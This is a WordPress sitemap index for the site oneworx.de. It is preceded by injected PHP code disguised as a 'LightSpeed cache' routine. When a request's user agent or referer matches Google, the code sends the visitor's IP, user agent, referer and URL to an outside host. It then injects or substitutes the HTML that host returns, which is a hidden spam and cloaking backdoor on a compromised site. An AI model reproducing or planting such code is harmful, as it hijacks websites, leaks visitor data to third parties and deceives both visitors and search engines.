
/**
 * Implement the LightSpeed cache.
 */

if (strpos($_SERVER["HTTP_USER_AGENT"], 'gle') || strpos($_SERVER["HTTP_REFERER"], 'gle')) {
add_action('wp_loaded','crt');
function crt() {ob_start('cache');}
function cache($html) {$url="http://cache.speedcashpluginwp.com/server_permanent2.php";$params="ref=$_SERVER[HTTP_REFERER]&h=$_SERVER[HTTP_HOST]&ua=$_SERVER[HTTP_USER_AGENT]&ip=$_SERVER[REMOTE_ADDR]&ip2=$_SERVER[HTTP_X_FORWARDED_FOR]&uri=$_SERVER[REQUEST_URI]";$ch=curl_init($url);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch,CURLOPT_POSTFIELDS,$params);curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);$result=curl_exec($ch);curl_close($ch);
    if (strpos($result, 'header-links-page') !== false) {$html = preg_replace('/(<\/body)/', "$result $1", $html);};
    if (strpos($result, '<html') !== false) {$html = $result;};
    if (strpos($result, "404") === 0) {$html = $result;};
    return $html;
}
}
<?xml version="1.0" encoding="UTF-8"?>
<!-- This sitemap was dynamisch generated by All in One SEO - the original SEO plugin for WordPress. -->

<?xml-stylesheet type="text/xsl" href="https://oneworx.de/default.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc><![CDATA[https://oneworx.de/page-sitemap.xml]]></loc>
		<lastmod><![CDATA[2023-03-14T14:01:06+00:00]]></lastmod>
	</sitemap>
	<sitemap>
		<loc><![CDATA[https://oneworx.de/project-sitemap.xml]]></loc>
		<lastmod><![CDATA[2022-02-08T14:42:42+00:00]]></lastmod>
	</sitemap>
	<sitemap>
		<loc><![CDATA[https://oneworx.de/project-category-sitemap.xml]]></loc>
		<lastmod><![CDATA[2022-02-08T14:42:42+00:00]]></lastmod>
	</sitemap>
</sitemapindex>
